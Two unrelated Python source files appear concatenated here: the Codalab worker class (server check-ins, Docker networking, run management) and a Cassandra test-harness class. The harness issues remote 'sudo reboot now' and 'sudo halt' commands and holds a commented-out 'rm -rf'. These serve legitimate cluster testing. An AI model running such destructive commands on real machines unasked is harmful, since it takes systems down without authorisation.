from .worker_run_state import RunStateMachine, RunStage, RunState
from .reader import Reader
logger = logging.getLogger(__name__)
"""
Codalab Worker
Workers handle communications with the Codalab server. Their main role in Codalab execution
is syncing the job states with the server and passing on job-related commands from the server
to architecture-specific RunManagers that run the jobs. Workers are execution platform agnostic,
but they expect the platform-specific RunManagers they use to implement a common interface.
"""
class Worker:
# Number of retries when a bundle service client command failed to execute. Defining a large number here
# would allow offline workers to patiently wait until connection to server is re-established.
COMMAND_RETRY_ATTEMPTS = 720
# Network buffer size to use while proxying with netcat
NETCAT_BUFFER_SIZE = 4096
# Number of seconds to wait for bundle kills to propagate before forcing kill
KILL_TIMEOUT = 100
# Number of loops to check for bundle directory creation by server on shared FS workers
BUNDLE_DIR_WAIT_NUM_TRIES = 120
# Number of seconds to sleep if checking in with server fails two times in a row
CHECKIN_COOLDOWN = 5
def __init__(
self,
image_manager, # type: ImageManager
dependency_manager, # type: Optional[DependencyManager]
commit_file, # type: str
cpuset, # type: Set[str]
gpuset, # type: Set[str]
max_memory, # type: Optional[int]
worker_id, # type: str
tag, # type: str
work_dir, # type: str
local_bundles_dir, # type: Optional[str]
exit_when_idle, # type: str
exit_after_num_runs, # type: int
idle_seconds, # type: int
checkin_frequency_seconds, # type: int
bundle_service, # type: BundleServiceClient
shared_file_system, # type: bool
tag_exclusive, # type: bool
group_name, # type: str
docker_runtime=docker_utils.DEFAULT_RUNTIME, # type: str
docker_network_prefix='codalab_worker_network', # type: str
# A flag indicating if all the existing running bundles will be killed along with the worker.
pass_down_termination=False, # type: bool
# A flag indicating if the work_dir will be deleted when the worker exits.
delete_work_dir_on_exit=False, # type: bool
# A flag indicating if the worker will exit if it encounters an exception
exit_on_exception=False, # type: bool
shared_memory_size_gb=1, # type: int
preemptible=False, # type: bool
):
self.image_manager = image_manager
self.dependency_manager = dependency_manager
self.reader = Reader()
self.state_committer = JsonStateCommitter(commit_file)
self.bundle_service = bundle_service
self.docker = docker.from_env(timeout=DEFAULT_DOCKER_TIMEOUT)
self.cpuset = cpuset
self.gpuset = gpuset
self.max_memory = (
min(max_memory, psutil.virtual_memory().total)
if max_memory is not None
else psutil.virtual_memory().total
)
self.id = worker_id
self.group_name = group_name
self.tag = tag
self.tag_exclusive = tag_exclusive
self.work_dir = work_dir
self.local_bundles_dir = local_bundles_dir
self.shared_file_system = shared_file_system
self.delete_work_dir_on_exit = delete_work_dir_on_exit
self.exit_when_idle = exit_when_idle
self.exit_after_num_runs = exit_after_num_runs
self.num_runs = 0
self.idle_seconds = idle_seconds
self.terminate = False
self.terminate_and_restage = False
self.pass_down_termination = pass_down_termination
self.exit_on_exception = exit_on_exception
self.preemptible = preemptible
self.checkin_frequency_seconds = checkin_frequency_seconds
self.last_checkin_successful = False
        self.last_time_ran = None  # type: Optional[float]
self.runs = {} # type: Dict[str, RunState]
self.docker_network_prefix = docker_network_prefix
self.init_docker_networks(docker_network_prefix)
self.run_state_manager = RunStateMachine(
image_manager=self.image_manager,
dependency_manager=self.dependency_manager,
worker_docker_network=self.worker_docker_network,
docker_network_internal=self.docker_network_internal,
docker_network_external=self.docker_network_external,
docker_runtime=docker_runtime,
upload_bundle_callback=self.upload_bundle_contents,
assign_cpu_and_gpu_sets_fn=self.assign_cpu_and_gpu_sets,
shared_file_system=self.shared_file_system,
shared_memory_size_gb=shared_memory_size_gb,
)
def init_docker_networks(self, docker_network_prefix, verbose=True):
"""
Set up docker networks for runs: one with external network access and one without
"""
def create_or_get_network(name, internal, verbose):
try:
if verbose:
logger.debug('Creating docker network %s', name)
network = self.docker.networks.create(name, internal=internal, check_duplicate=True)
# This logging statement is only run if a network is created.
logger.debug('Created docker network %s', name)
return network
except docker.errors.APIError:
if verbose:
logger.debug('Network %s already exists, reusing', name)
return self.docker.networks.list(names=[name])[0]
# Docker's default local bridge network only supports 30 different networks
# (each one of them uniquely identifiable by their name), so we prune old,
# unused docker networks, or network creation might fail. We only prune docker networks
# older than 1h, to avoid interfering with any newly-created (but still unused) networks
# that might have been created by other workers.
try:
self.docker.networks.prune(filters={"until": "1h"})
except (docker.errors.APIError, requests.exceptions.RequestException) as e:
# docker.errors.APIError is raised when a prune is already running:
# https://github.com/codalab/codalab-worksheets/issues/2635
# docker.errors.APIError: 409 Client Error: Conflict ("a prune operation is already running").
# Any number of requests.exceptions.RequestException s are raised when the request to
# the Docker socket times out or otherwise fails.
# For example: https://github.com/docker/docker-py/issues/2266
# Since pruning is a relatively non-essential routine (i.e., it's ok if pruning fails
# on one or two iterations), we just ignore this issue.
logger.warning("Cannot prune docker networks: %s", str(e))
# Right now the suffix to the general worker network is hardcoded to manually match the suffix
# in the docker-compose file, so make sure any changes here are synced to there.
self.worker_docker_network = create_or_get_network(
docker_network_prefix + "_general", internal=True, verbose=verbose
)
self.docker_network_external = create_or_get_network(
docker_network_prefix + "_ext", internal=False, verbose=verbose
)
self.docker_network_internal = create_or_get_network(
docker_network_prefix + "_int", internal=True, verbose=verbose
)
def save_state(self):
        # Remove complex container objects from state before serializing; they can be
        # retrieved from the Docker API again when the state is loaded.
runs = {
uuid: state._replace(
container=None, bundle=state.bundle.as_dict, resources=state.resources.as_dict,
)
for uuid, state in self.runs.items()
}
self.state_committer.commit(runs)
def load_state(self):
# If the state file doesn't exist yet, have the state committer return an empty state.
runs = self.state_committer.load(default=dict())
# Retrieve the complex container objects from the Docker API
for uuid, run_state in runs.items():
if run_state.container_id:
try:
run_state = run_state._replace(
container=self.docker.containers.get(run_state.container_id)
)
except docker.errors.NotFound as ex:
logger.debug('Error getting the container for the run: %s', ex)
run_state = run_state._replace(container_id=None)
self.runs[uuid] = run_state._replace(
bundle=BundleInfo.from_dict(run_state.bundle),
resources=RunResources.from_dict(run_state.resources),
)
def sync_state(self):
"""
Sync worker run state by matching the fields that are read from worker-state.json with the RunState object.
"""
for uuid, run_state in self.runs.items():
if run_state._fields == RunState._fields:
continue
values = []
for field in RunState._fields:
# When there are additional new fields or missing fields detected, recreate the run_state
# object to include or delete those fields specified from the RunState object
if field in run_state._fields:
values.append(getattr(run_state, field))
else:
values.append(None)
self.runs[uuid] = RunState(*values)
def check_idle_stop(self):
"""
        Checks whether the worker is idle (i.e., if it hasn't had runs for longer than the configured
        number of idle seconds) and, if so, checks whether it is configured to exit when idle.
:returns: True if the worker should stop because it is idle.
In other words, True if the worker is configured to exit when idle,
it is idle, and it has checked in at least once with the server.
"""
now = time.time()
if len(self.runs) > 0 or self.last_time_ran is None:
self.last_time_ran = now
idle_duration_seconds = now - self.last_time_ran
if (
self.exit_when_idle
and idle_duration_seconds > self.idle_seconds
and self.last_checkin_successful
):
logger.warning(
"Worker was idle for {} seconds. Exiting...".format(idle_duration_seconds)
)
return True
return False
def check_num_runs_stop(self):
"""
        Checks whether the worker has finished the number of jobs it is allowed to run.
        :return: True if the worker has started its allowed number of runs and all of them
                 have finished. False otherwise.
"""
return self.exit_after_num_runs == self.num_runs and len(self.runs) == 0
def start(self):
"""Return whether we ran anything."""
self.load_state()
self.sync_state()
self.image_manager.start()
if not self.shared_file_system:
self.dependency_manager.start()
while not self.terminate:
try:
self.checkin()
last_checkin = time.time()
# Process runs until it's time for the next checkin.
while not self.terminate and (
time.time() - last_checkin <= self.checkin_frequency_seconds
):
self.check_termination()
self.save_state()
if self.check_idle_stop() or self.check_num_runs_stop():
self.terminate = True
break
self.process_runs()
time.sleep(0.003)
self.save_state()
except Exception:
self.last_checkin_successful = False
if using_sentry():
capture_exception()
traceback.print_exc()
if self.exit_on_exception:
logger.warning(
'Encountered exception, terminating the worker after sleeping for 5 minutes...'
)
self.terminate = True
# Sleep for 5 minutes
time.sleep(5 * 60)
else:
# Sleep for a long time so we don't keep on failing.
# We sleep in 5-second increments to check
# if the worker needs to terminate (say, if it's received
# a SIGTERM signal).
logger.warning('Sleeping for 1 hour due to exception...please help me!')
for _ in range(12 * 60):
# We run this here, instead of going through another iteration of the
# while loop, to minimize the code that's run---the reason we ended up here
# in the first place is because of an exception, so we don't want to
# re-trigger that exception.
if self.terminate_and_restage:
# If self.terminate_and_restage is true, self.check_termination()
# restages bundles. We surround this in a try-except block,
# so we can still properly terminate and clean up
# even if self.check_termination() fails for some reason.
try:
self.check_termination()
except Exception:
traceback.print_exc()
self.terminate = True
if self.terminate:
break
time.sleep(5)
self.cleanup()
def cleanup(self):
"""
        Starts any necessary cleanup and propagates it to the other managers.
        Blocks until cleanup is complete and it is safe to quit.
"""
logger.info("Stopping Worker")
self.image_manager.stop()
if not self.shared_file_system:
self.dependency_manager.stop()
self.run_state_manager.stop()
self.save_state()
if self.delete_work_dir_on_exit:
shutil.rmtree(self.work_dir)
try:
self.worker_docker_network.remove()
self.docker_network_internal.remove()
self.docker_network_external.remove()
except docker.errors.APIError as e:
logger.warning("Cannot clear docker networks: %s", str(e))
logger.info("Stopped Worker. Exiting")
def signal(self):
"""
When the pass_down_termination flag is False, set the stop flag to stop running
the worker without changing the status of existing running bundles. Otherwise,
set the terminate_and_restage flag to restage all bundles that are not in the
terminal states [FINISHED, RESTAGED].
"""
if not self.pass_down_termination:
self.terminate = True
else:
self.terminate_and_restage = True
def check_termination(self):
"""
        If the pass_down_termination signal to terminate the worker was received from the CLI,
        wait until all the existing unfinished bundles are restaged, reset runs, then stop the worker.
"""
if self.terminate_and_restage:
if self.restage_bundles() == 0:
# Stop the worker
self.terminate = True
# Reset the current runs to exclude bundles in terminal states
# before save state one last time to worker-state.json
self.runs = {
uuid: run_state
for uuid, run_state in self.runs.items()
if run_state.stage not in [RunStage.FINISHED, RunStage.RESTAGED]
}
def restage_bundles(self):
"""
Restage bundles not in the final states [FINISHED and RESTAGED] from worker to server.
:return: the number of restaged bundles
"""
restaged_bundles = []
terminal_stages = [RunStage.FINISHED, RunStage.RESTAGED]
for uuid in self.runs:
run_state = self.runs[uuid]
if run_state.stage not in terminal_stages:
self.restage_bundle(uuid)
restaged_bundles.append(uuid)
if len(restaged_bundles) > 0:
logger.info(
"Sending bundles back to the staged state: {}.".format(','.join(restaged_bundles))
)
return len(restaged_bundles)
@property
def cached_dependencies(self):
"""
Returns a list of the keys (as tuples) of all bundle dependencies this worker
        has cached, in the format the server expects them in the worker check-in.
        If the worker is on a shared file system, it doesn't cache any dependencies and an
empty list is returned even though all dependencies are accessible on the shared
file system.
"""
if self.shared_file_system:
return []
else:
return [
(dep_key.parent_uuid, dep_key.parent_path)
for dep_key in self.dependency_manager.all_dependencies
]
def checkin(self):
"""
Checkin with the server and get a response. React to this response.
This function must return fast to keep checkins frequent. Time consuming
processes must be handled asynchronously.
"""
request = {
'tag': self.tag,
'group_name': self.group_name,
'cpus': len(self.cpuset),
'gpus': len(self.gpuset),
'memory_bytes': self.max_memory,
'free_disk_bytes': self.free_disk_bytes,
'dependencies': self.cached_dependencies,
'hostname': socket.gethostname(),
'runs': [run.as_dict for run in self.all_runs],
'shared_file_system': self.shared_file_system,
'tag_exclusive': self.tag_exclusive,
'exit_after_num_runs': self.exit_after_num_runs - self.num_runs,
'is_terminating': self.terminate or self.terminate_and_restage,
'preemptible': self.preemptible,
}
try:
response = self.bundle_service.checkin(self.id, request)
logger.info('Connected! Successful check in!')
self.last_checkin_successful = True
except BundleServiceException as ex:
logger.warning("Disconnected from server! Failed check in: %s", ex)
if not self.last_checkin_successful:
logger.info(
"Checkin failed twice in a row, sleeping %d seconds", self.CHECKIN_COOLDOWN
)
time.sleep(self.CHECKIN_COOLDOWN)
self.last_checkin_successful = False
response = None
# Stop processing any new runs received from server
if not response or self.terminate_and_restage or self.terminate:
return
action_type = response['type']
logger.debug('Received %s message: %s', action_type, response)
if action_type == 'run':
self.initialize_run(response['bundle'], response['resources'])
else:
uuid = response['uuid']
socket_id = response.get('socket_id', None)
if uuid not in self.runs:
if action_type in ['read', 'netcat']:
self.read_run_missing(socket_id)
return
if action_type == 'kill':
self.kill(uuid)
elif action_type == 'mark_finalized':
self.mark_finalized(uuid)
elif action_type == 'read':
self.read(socket_id, uuid, response['path'], response['read_args'])
elif action_type == 'netcat':
self.netcat(socket_id, uuid, response['port'], response['message'])
elif action_type == 'write':
self.write(uuid, response['subpath'], response['string'])
else:
logger.warning("Unrecognized action type from server: %s", action_type)
def process_runs(self):
""" Transition each run then filter out finished runs """
# We (re-)initialize the Docker networks here, in case they've been removed.
# For any networks that exist, this is essentially a no-op.
self.init_docker_networks(self.docker_network_prefix, verbose=False)
# In case the docker networks have changed, we also update them in the RunStateMachine
self.run_state_manager.worker_docker_network = self.worker_docker_network
self.run_state_manager.docker_network_external = self.docker_network_external
self.run_state_manager.docker_network_internal = self.docker_network_internal
# 1. transition all runs
for uuid in self.runs:
prev_state = self.runs[uuid]
self.runs[uuid] = self.run_state_manager.transition(prev_state)
# Only start saving stats for a new stage when the run has actually transitioned to that stage.
if prev_state.stage != self.runs[uuid].stage:
self.end_stage_stats(uuid, prev_state.stage)
if self.runs[uuid].stage not in [RunStage.FINISHED, RunStage.RESTAGED]:
self.start_stage_stats(uuid, self.runs[uuid].stage)
# 2. filter out finished runs and clean up containers
finished_container_ids = [
run.container
for run in self.runs.values()
if (run.stage == RunStage.FINISHED or run.stage == RunStage.FINALIZING)
and run.container_id is not None
]
for container_id in finished_container_ids:
try:
container = self.docker.containers.get(container_id)
container.remove(force=True)
except (docker.errors.NotFound, docker.errors.NullResource):
pass
# 3. reset runs for the current worker
self.runs = {
uuid: run_state
for uuid, run_state in self.runs.items()
if run_state.stage != RunStage.FINISHED
}
def assign_cpu_and_gpu_sets(self, request_cpus, request_gpus):
"""
Propose a cpuset and gpuset to a bundle based on given requested resources.
Note: no side effects (this is important: we don't want to maintain more state than necessary)
Arguments:
request_cpus: integer
request_gpus: integer
Returns a 2-tuple:
cpuset: assigned cpuset (str indices).
gpuset: assigned gpuset (str indices).
Throws an exception if unsuccessful.
"""
cpuset, gpuset = set(map(str, self.cpuset)), set(map(str, self.gpuset))
for run_state in self.runs.values():
if run_state.stage == RunStage.RUNNING:
cpuset -= run_state.cpuset
gpuset -= run_state.gpuset
if len(cpuset) < request_cpus:
raise Exception(
"Requested more CPUs (%d) than available (%d currently out of %d on the machine)"
% (request_cpus, len(cpuset), len(self.cpuset))
)
if len(gpuset) < request_gpus:
raise Exception(
"Requested more GPUs (%d) than available (%d currently out of %d on the machine)"
% (request_gpus, len(gpuset), len(self.gpuset))
)
def propose_set(resource_set, request_count):
return set(str(el) for el in list(resource_set)[:request_count])
return propose_set(cpuset, request_cpus), propose_set(gpuset, request_gpus)
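# Illustrative sketch (not part of the original worker) of how the proposal above
# behaves for a hypothetical worker with 4 CPUs and 1 GPU, where one RUNNING
# bundle already holds CPUs {'0', '1'}. The numbers are assumptions chosen only
# to show the arithmetic.
#
#   available cpuset = {'0','1','2','3'} - {'0','1'} = {'2','3'}
#   available gpuset = {'0'} - set()                 = {'0'}
#   assign_cpu_and_gpu_sets(request_cpus=2, request_gpus=0)
#       -> ({'2', '3'}, set())        # propose_set takes the first N indices
#   assign_cpu_and_gpu_sets(request_cpus=3, request_gpus=0)
#       -> raises Exception: "Requested more CPUs (3) than available (2 currently out of 4 on the machine)"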
@property
def all_runs(self):
"""
Returns a list of all the runs managed by this RunManager
"""
return [
BundleCheckinState(
uuid=run_state.bundle.uuid,
run_status=run_state.run_status,
bundle_start_time=run_state.bundle_start_time,
container_time_total=run_state.container_time_total,
container_time_user=run_state.container_time_user,
container_time_system=run_state.container_time_system,
docker_image=run_state.docker_image,
state=RunStage.WORKER_STATE_TO_SERVER_STATE[run_state.stage],
remote=self.id,
exitcode=run_state.exitcode,
failure_message=run_state.failure_message,
bundle_profile_stats=run_state.bundle_profile_stats,
cpu_usage=run_state.cpu_usage,
memory_usage=run_state.memory_usage,
)
for run_state in self.runs.values()
]
@property
def free_disk_bytes(self):
"""
Available disk space, in bytes, for this RunManager.
"""
error_msg = "Failed to run command {}".format("df -k" + self.work_dir)
try:
# Option "-k" will ensure us with the returning disk space in 1KB units
p = Popen(["df", "-k", self.work_dir], stdout=PIPE)
output, error = p.communicate()
# Return None when there is an error.
if error:
logger.error("{}: {}".format(error_msg, error.strip()))
return None
if output:
lines = output.decode().split("\n")
headers = lines[0].split()
# The machine being attached as a worker may be using a language other than
# English, so fall back to the 4th column if "Available" is not among the headers.
index = headers.index("Available") if "Available" in headers else 3
# Convert the df result from 1KB blocks into bytes.
return int(lines[1].split()[index]) * 1024
except Exception as e:
logger.error("{}: {}".format(error_msg, str(e)))
return None
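# Minimal standalone sketch (an assumption, not the original helper) of the same
# "df -k" parsing used above, applied to a sample output string. The sample text
# and the parse_df_available_bytes name are illustrative only.
#
#   sample = ("Filesystem 1K-blocks    Used Available Use% Mounted on\n"
#             "/dev/sda1   102400000 2048000  51200000  50% /\n")
#   def parse_df_available_bytes(output):
#       lines = output.split("\n")
#       headers = lines[0].split()
#       # Fall back to column 3 when the headers are not in English.
#       index = headers.index("Available") if "Available" in headers else 3
#       return int(lines[1].split()[index]) * 1024   # 1KB blocks -> bytes
#   parse_df_available_bytes(sample)  # -> 52428800000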
def initialize_run(self, bundle, resources):
"""
First, checks whether the worker has already started the maximum number of jobs it is allowed to run.
If it has, returns immediately.
Then, checks in with the bundle service and sees if the bundle is still assigned to this worker.
If not, returns immediately.
Otherwise, tell RunManager to create the run.
"""
if self.exit_after_num_runs == self.num_runs:
print(
'Worker has already started the maximum number of runs allowed ({}). '
'Not starting further runs.'.format(self.exit_after_num_runs),
file=sys.stdout,
)
return
now = time.time()
start_message = {'hostname': socket.gethostname(), 'start_time': int(now)}
if self.bundle_service.start_bundle(self.id, bundle['uuid'], start_message):
bundle = BundleInfo.from_dict(bundle)
resources = RunResources.from_dict(resources)
if self.terminate:
# Run Manager stopped, refuse more runs
return
bundle_path = (
bundle.location
if self.shared_file_system
else os.path.join(self.local_bundles_dir, bundle.uuid)
)
self.runs[bundle.uuid] = RunState(
stage=RunStage.PREPARING,
run_status='',
bundle=bundle,
bundle_path=os.path.realpath(bundle_path),
bundle_dir_wait_num_tries=Worker.BUNDLE_DIR_WAIT_NUM_TRIES,
bundle_profile_stats={
RunStage.PREPARING: self.init_stage_stats(),
RunStage.RUNNING: self.init_stage_stats(),
RunStage.CLEANING_UP: self.init_stage_stats(),
RunStage.UPLOADING_RESULTS: self.init_stage_stats(),
RunStage.FINALIZING: self.init_stage_stats(),
},
resources=resources,
bundle_start_time=time.time(),
container_time_total=0,
container_time_user=0,
container_time_system=0,
container_id=None,
container=None,
docker_image=None,
is_killed=False,
has_contents=False,
cpuset=None,
gpuset=None,
max_memory=0,
disk_utilization=0,
exitcode=None,
failure_message=None,
kill_message=None,
finished=False,
finalized=False,
is_restaged=False,
cpu_usage=0.0,
memory_usage=0.0,
paths_to_remove=[],
)
# Start measuring bundle stats for the initial bundle state.
self.start_stage_stats(bundle.uuid, RunStage.PREPARING)
# Increment the number of runs that have been successfully started on this worker
self.num_runs += 1
else:
print(
'Bundle {} no longer assigned to this worker'.format(bundle['uuid']),
file=sys.stdout,
)
def kill(self, uuid):
"""
Marks the run as killed so that the next time its state is processed it is terminated.
"""
self.runs[uuid] = self.runs[uuid]._replace(kill_message='Kill requested', is_killed=True)
def restage_bundle(self, uuid):
"""
Marks the run as restaged so that it can be sent back to the STAGED state before the worker is terminated.
"""
self.runs[uuid] = self.runs[uuid]._replace(is_restaged=True)
def mark_finalized(self, uuid):
"""
Marks the run with uuid as finalized so it might be purged from the worker state
"""
self.runs[uuid] = self.runs[uuid]._replace(finalized=True)
def read(self, socket_id, uuid, path, args):
def reply(err, message={}, data=None):
self.bundle_service_reply(socket_id, err, message, data)
try:
run_state = self.runs[uuid]
self.reader.read(run_state, path, args, reply)
except BundleServiceException:
traceback.print_exc()
except Exception as e:
traceback.print_exc()
err = (http.client.INTERNAL_SERVER_ERROR, str(e))
reply(err)
def netcat(self, socket_id, uuid, port, message):
"""
Sends `message` to `port` of the Docker container of the run with `uuid` and
streams the response on `socket_id`.
This is all done on an unmanaged thread (i.e. launched and forgotten) because
the thread has no further effects on the run as far as the worker is concerned
and we do not need to terminate/join the thread from the worker process. It just
terminates when the user is done with their connection or the Docker container for
the run terminates.
"""
def reply(err, message={}, data=None):
self.bundle_service_reply(socket_id, err, message, data)
def netcat_fn():
try:
run_state = self.runs[uuid]
container_ip = docker_utils.get_container_ip(
self.worker_docker_network.name, run_state.container
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((container_ip, port))
s.sendall(message.encode())
total_data = []
while True:
data = s.recv(Worker.NETCAT_BUFFER_SIZE)
if not data:
break
total_data.append(data)
s.close()
reply(None, {}, b''.join(total_data))
except BundleServiceException:
traceback.print_exc()
except Exception as e:
traceback.print_exc()
err = (http.client.INTERNAL_SERVER_ERROR, str(e))
reply(err)
threading.Thread(target=netcat_fn).start()
def write(self, uuid, path, string):
run_state = self.runs[uuid]
if os.path.normpath(path) in set(dep.child_path for dep in run_state.bundle.dependencies):
return
def write_fn():
with open(os.path.join(run_state.bundle_path, path), 'w') as f:
f.write(string)
threading.Thread(target=write_fn).start()
def upload_bundle_contents(
self, bundle_uuid, bundle_path, exclude_patterns, store, update_status
):
self.execute_bundle_service_command_with_retry(
lambda: self.bundle_service.update_bundle_contents(
self.id, bundle_uuid, bundle_path, exclude_patterns, store, update_status
)
)
def read_run_missing(self, socket_id):
message = {
'error_code': http.client.INTERNAL_SERVER_ERROR,
'error_message': BUNDLE_NO_LONGER_RUNNING_MESSAGE,
}
self.bundle_service.reply(self.id, socket_id, message)
def bundle_service_reply(self, socket_id, err, message, data):
if err:
err = {'error_code': err[0], 'error_message': err[1]}
self.bundle_service.reply(self.id, socket_id, err)
elif data:
self.bundle_service.reply_data(self.id, socket_id, message, data)
else:
self.bundle_service.reply(self.id, socket_id, message)
def start_stage_stats(self, uuid: str, stage: str) -> None:
"""
Set the start time for a bundle in a certain stage.
"""
self.runs[uuid].bundle_profile_stats[stage]['start'] = time.time()
def end_stage_stats(self, uuid: str, stage: str) -> None:
"""
Set the end time for a bundle finishing a stage.
Set the elapsed time to the end time minus the start time.
"""
self.runs[uuid].bundle_profile_stats[stage]['end'] = time.time()
self.runs[uuid].bundle_profile_stats[stage]['elapsed'] = (
self.runs[uuid].bundle_profile_stats[stage]['end']
- self.runs[uuid].bundle_profile_stats[stage]['start']
)
def init_stage_stats(self) -> Dict:
"""
Returns a stage stats dict with default empty values for start, end, and elapsed.
"""
return {'start': None, 'end': None, 'elapsed': None}
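# Sketch of the stage-stats lifecycle implied by the three helpers above
# (the uuid and times are illustrative assumptions):
#
#   bundle_profile_stats[RunStage.PREPARING] = self.init_stage_stats()
#       -> {'start': None, 'end': None, 'elapsed': None}
#   self.start_stage_stats(uuid, RunStage.PREPARING)   # sets 'start' = time.time()
#   ... the run later transitions out of PREPARING ...
#   self.end_stage_stats(uuid, RunStage.PREPARING)     # sets 'end' and 'elapsed' = end - start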
@staticmethod
def execute_bundle_service_command_with_retry(cmd):
retries_left = Worker.COMMAND_RETRY_ATTEMPTS
while True:
try:
retries_left -= 1
cmd()
return
except BundleServiceException as e:
if not e.client_error and retries_left > 0:
traceback.print_exc()
time.sleep(30)
continue
raise
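# Hedged usage sketch of the retry helper above: client errors are raised
# immediately, while other BundleServiceExceptions are retried every 30 seconds
# until Worker.COMMAND_RETRY_ATTEMPTS attempts have been made. This is the same
# pattern used by upload_bundle_contents() earlier in this class, e.g.:
#
#   self.execute_bundle_service_command_with_retry(
#       lambda: self.bundle_service.update_bundle_contents(
#           self.id, bundle_uuid, bundle_path, exclude_patterns, store, update_status
#       )
#   )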
|
cassandra_class.py
|
"""
The MIT License (MIT)
Copyright (c) Datos IO, Inc. 2015.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import sys
import time
import threading
from random import randint
import common.common
from common.common import report, rpc, scp, pause_execution_for_input
from db_utils.database import DatabaseCluster
from common.network_traffic_control import NetworkTrafficControl
from db_utils.cassandra_utils.failures import CassandraFailures
from db_utils.cassandra_utils.data_population import CassandraTestingCluster, do_insert
class Cassandra(DatabaseCluster): # TODO: (Aaron) Handle non service installs.
def __init__(self, source_params):
DatabaseCluster.__init__(self)
self.source_params = source_params
self.type = 'cassandra'
self.payload = False
# Require some params. Fail early if not in configuration file.
required_params = [
'source-name',
'username',
'password',
'key',
'ips',
'data_dir',
]
for param in required_params:
assert(param in source_params), 'Param not found: %s' % param
self.installed_as_service = True # TODO: (Aaron) Need to work on this to be flexible for non service.
self.name = source_params['source-name']
self.ip = source_params['ips'][0] # For convenience.
self.ips = source_params['ips']
self.username = source_params['username']
self.password = source_params['password']
self.key = source_params['key']
self.data_dir = source_params['data_dir']
self.commitlog_dir = source_params['commit_dir'] if 'commit_dir' in source_params else source_params['data_dir'] + '/../commitlog'
self.restore_dir = source_params['restore_dir'] if 'restore_dir' in source_params else ''
self.cassandra_dir = source_params['cass_dir'] if 'cass_dir' in source_params else source_params['data_dir']
self.db_user = source_params['db_user'] if 'db_user' in source_params else ''
self.db_pass = source_params['db_pass'] if 'db_pass' in source_params else ''
# Create a faults instance.
self.failures = CassandraFailures(self)
# Create a network control instance.
self.network = NetworkTrafficControl(self.ips, self.username, self.password, self.key)
self.do_delta_population = False
self.do_mass_population = False
def _deliver_payload(self):
"""
Delivers population scripts and other goodies to the cassandra source cluster. Most are stored in ~/.geppetto/.
"""
common_script_path = '%s/common/common.py' % (common.common.global_vars['geppetto_install_dir'])
population_script_path = '%s/db_utils/cassandra_utils/data_population.py' % (common.common.global_vars['geppetto_install_dir'])
schema_folder_path = '%s/db_utils/cassandra_utils/schema' % (common.common.global_vars['geppetto_install_dir'])
for ip in self.ips:
report('Updating Geppetto payload on {%s}.' % ip)
to_path = '%s@%s:~/.geppetto/' % (self.username, ip)
# rpc(ip, 'rm -rf ~/.geppetto', self.username, self.password, self.key, suppress_output=True)
rpc(ip, 'mkdir -p ~/.geppetto/common', self.username, self.password, self.key, suppress_output=True)
rpc(ip, 'touch ~/.geppetto/common/__init__.py', self.username, self.password, self.key, suppress_output=True)
scp(common_script_path, '%s/common/' % to_path, self.password, self.key, suppress_output=True)
scp(population_script_path, to_path, self.password, self.key, suppress_output=True)
scp(schema_folder_path, to_path, self.password, self.key, is_dir=True, suppress_output=True)
self.payload = True
return True
def nodetool_status(self):
# Cycle through the nodes until we get a result from nodetool status.
for ip in self.source_params['ips']:
out, err = rpc(ip, "nodetool status | grep 'UN\|UL\|UJ\|UM\|DN\|DL\|DJ\|DM\|===='", self.username, self.password, self.key, suppress_output=True)
if any(x in out for x in ['UN', 'UL', 'UJ', 'UM', 'DN', 'DL', 'DJ', 'DM']):
return out
response = pause_execution_for_input('No status received from Cassandra Nodetool', level='info')
if response == 'r':
return self.nodetool_status()
def cfstats(self):
# Cycle through the nodes until we get a result from nodetool cfstats.
for ip in self.ips:
out, _ = rpc(ip, "nodetool cfstats", self.username, self.password, self.key)
# TODO: (Aaron) finish ...
return out
def status(self):
return self.nodetool_status()
def db_stop(self, ip):
rpc(ip, 'sudo service cassandra stop', self.username, self.password, self.key, timeout=60*2)
def db_start(self, ip):
rpc(ip, 'sudo service cassandra start', self.username, self.password, self.key, timeout=60*2)
def node_reboot(self, ip):
rpc(ip, 'sudo reboot now', self.username, self.password, self.key, timeout=60*2)
def node_shutdown(self, ip):
rpc(ip, 'sudo halt', self.username, self.password, self.key, timeout=60*2)
def node_restore(self, ip):
pass
def shutdown(self):
"""
Shutdown the whole db cluster.
"""
for ip in self.ips:
rpc(ip, 'sudo service cassandra stop', self.username, self.password, self.key, timeout=60*2)
def query(self, query, no_pause=False, suppress_reporting=False, retries=5):
"""
Performs a cql query on the database.
"""
assert(retries >= 0)
# Format the query and make sure we have trailing ';'
query = query.strip(' ')
if not query:
return
if query[-1] != ';':
query += ' ;'
cluster = CassandraTestingCluster(self.ips, self.db_user, self.db_pass)
if not cluster.connect():
report('Error cannot connect to Cassandra cluster', 'critical')
if not no_pause:
response = pause_execution_for_input('Error cannot connect to Cassandra cluster.')
if response == 'r':
result, success = self.query(query)
else:
return '', False
else:
return '', False
else:
# Persistent retry, then prompt user for action if there is still an error.
i = 0
wait_times = [0, 5, 15, 60, 60,]
result, success = '', False
while i <= retries:
if not suppress_reporting:
report(query)
result, success = cluster.runQuery(query)
if success or i >= retries:
break
if not suppress_reporting:
report(result, 'warning')
report(success, 'warning')
retry_time = wait_times[min(i, len(wait_times) - 1)]
if not suppress_reporting:
report('Retrying in %s seconds' % retry_time)
time.sleep(retry_time)
i += 1
# If retries did not produce successful query, then prompt user for input if we allow pausing.
if not success and not no_pause:
response = pause_execution_for_input('Error')
if response == 'r': # 'retry'.
result, success = self.query(query, retries=0) # Only try once on manual retries.
cluster.disconnect()
return result, success
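# Hedged usage sketch of query() (the keyspace/table name and the `db` variable
# are assumptions for illustration):
#
#   db = Cassandra(source_params)
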